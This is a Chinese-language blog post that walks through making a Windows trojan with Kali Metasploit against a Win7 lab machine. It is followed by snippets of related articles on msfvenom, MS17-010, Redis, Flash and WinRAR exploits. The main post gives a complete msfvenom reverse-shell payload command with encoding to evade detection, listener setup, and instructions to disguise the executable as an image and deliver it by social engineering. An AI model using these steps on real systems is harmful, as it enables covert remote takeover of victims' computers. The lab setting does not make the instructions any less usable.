漏洞复现:使用Kali制作木马程序

漏洞复现:使用Kali制作木马程序

攻击机:Kali2019

靶机:Win7 64位

攻击步骤:

1.打开Kali2019和Win7 64位虚拟机,确定IP地址在一个网段

2.确定好IP地址,进入Kali2019进行木马文件.exe制作,命令如下

命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘0x00‘ LHOST=172.16.66.128 LPORT=5555 -f exe >pink.exe

备注:我们选择的靶机是Win7 64位,所以兼容性一定要设置好,否则会出错

3.接下来打开msf,编辑远程模块,设置payload,具体流程看图

4.开始设置Payload信息,输入show options查看,lhost和lport都要设置成exe文件中设置的地址和端口号

5.输入exploit开始运行监听模块,开始监听

6.把刚刚生成的pink程序通过压缩合并,制作一个图片exe文件,通过社工或者其他方法上传到win7 64位虚拟机中

7.运行这个文件,图片会打开,Kali2019会收到连接成功的提示

8.成功获取win7权限,渗透成功

原文地址:https://www.cnblogs.com/redHskb/p/11611945.html

时间: 2024-10-03 08:00:30

漏洞复现:使用Kali制作木马程序的相关文章

利用msfvenom制作木马程序(你可以得到她的一切)

实验环境: 虚拟机:kali  (攻击机)          192.168.1.2 虚拟机:windwos 2003 (靶机)   192.168.1.100 1. 制作木马 说明: -p payload(有效载荷) -e  编码方式 -i 编码次数 -b 在生成的程序中避免出现的值 -f exe 生成EXE的格式 输入命令之后会在home中生成一个 exe的文件 2. 然后在终端输入:msfconsole 然后 use exploit/multi/handler 然后 set payload

教你制作木马程序

今天是我第一次发帖,不知道说什么好有什么不好的地方请提出来,方便我以后改进. 前几天,我Q小号被盗了555 于是我就整了个病毒出来 在制作前,先说说病毒的来源吧: 首先可能你在网上曾经听到过木马,当然倒霉的话,也许也中过木马,但你可 能还是不曾了解木马这个词的由来,木马这个词的来源:记得历史上特洛伊木马的故事吗?希腊人围困特洛伊城长达九年的时间.然后在某一天早上,他们似乎是退却了.希腊人站在城墙上望去 ,看到的不是希腊军队,而是一件礼物--一匹巨大的木马.由于马是特洛伊人的圣物,所以他们费力地将

MS17-010漏洞复现(kali metasploit)

1.终端进入msf(在终端输入msfconsole),使用search命令查找漏洞模块: 2.根据靶机选择漏洞模块(此处靶机为win7 sp1),使用use+漏洞模块(msf5可以直接使用编号代替模块名称),然后使用show options查看需要的参数. 使用show options查看模块所需参数: 3.通过set [参数名] [参数值]设置参数(配置需要的参数(set rhost 192.168.43.222),run或exploit运行): 4.靶机的cmd: 预防:在微软官网根据漏洞编

[漏洞复现] CVE-2018-4878 Flash 0day

1.漏洞概述 2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878). 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被"远程代码执行",并且直接被getshell. 直到2018年2月5号,Adboe才发布补丁来修复此0 day漏洞. 互联网上出现的基于此Flash 0day漏洞进行攻击的样本,其实在2017年底就

Redis未授权访问漏洞复现

漏洞复现 攻击机 kali  ip:192.168.70.140 靶机 Ubuntu 16.04   ip:192.168.70.133 一.环境搭建 1.下载安装redis wgethttp://download.redis.io/releases/redis-3.2.11.tar.gz 2. 解压压缩包 tarzxvfredis-3.2.11.tar.gz. 3.进入解压目录redis-3.2.11 执行make命令 4. 进入src目录 cd redis-3.2.11/src 5.将red

EternalBlue永恒之蓝漏洞复现

EternalBlue漏洞复现 1.    实训目的 永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010.该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马.由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多

震网三代漏洞复现

一.  CVE-2017-8464远程命令执行漏洞(震网三代漏洞)复现 漏洞描述: 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享.当用户在Windows资源管理器或解析.LNK文件 的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同 的用户权限. 注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名. 漏洞影响范围: Microsoft

Appweb(CVE-2018-8715)漏洞复现

漏洞背景:Appweb是一个嵌入式HTTP Web服务器,主要的设计思路是安全.这是直接集成到客户的应用和设备,便于开发和部署基于Web的应用程序和设备.它迅速( 每秒处理3500多要求)而紧凑 ,其中包括支持动态网页制作,服务器端嵌入式脚本过程中的CGI ,可加载模块的SSL ,摘要式身份验证,虚拟主机, Apache样式配置,日志记录,单和多线程应用程序.它提供了大量的文档和示例. 漏洞复现:1.访问自己的目标.2.获取用户名,这个就显现出此漏洞的局限性了.靶场里告诉了有一个账户是joshu

WinRAR代码执行漏洞复现

漏洞介绍 WinRAR 是一款流行的解压缩工具,据其官网上发布的数据,全球有超过5亿的用户在使用 2019年2月20日,安全厂商 checkpoint 发布了名为<Extracting a 19 Year old code Execution from WinRAR>的文章,文章披露了一个存在于 winRAR 中用于 ace 文件解析的 DLL 模块中的绝对路径穿越漏洞,可导致远程代码执行. 漏洞类型:代码执行 漏洞利用条件:将压缩包解压到当前文件夹,同时释放恶意文件到指定目录,重启机器便会触